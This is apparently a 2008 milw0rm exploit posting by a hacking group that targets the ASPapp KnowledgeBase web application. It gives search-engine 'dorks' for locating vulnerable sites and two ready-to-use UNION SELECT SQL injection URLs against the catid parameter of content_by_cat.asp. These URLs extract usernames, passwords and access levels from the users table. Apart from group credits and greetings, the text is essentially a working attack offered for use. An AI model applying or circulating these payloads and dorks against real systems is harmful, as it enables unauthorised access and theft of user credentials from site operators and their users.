ASPapp Knowledge Base Remote SQL Injection Vulnerability

..##.....## ...##...## ....##.## .....###CoRPITX .....### ....##.## ...##...## ..##.....## -------------------------Turkey------------------------------ -----------------www.Hayalet-hack.com------------------------ -----------------www.xcorpitx-hack.com----------------------- ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability ------------------------------------------------------------- ------- Dork 1 - content_by_cat.asp?contentid ''catid'' Dork 2 - content_by_cat.asp? ''catid'' ------- exploit- ------- ------------------------------------------------------------- content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users ------------------------------------------------------------- ------------------------------------------------------------- content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users ------------------------------------------------------------- thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque- # milw0rm.com [2008-03-20]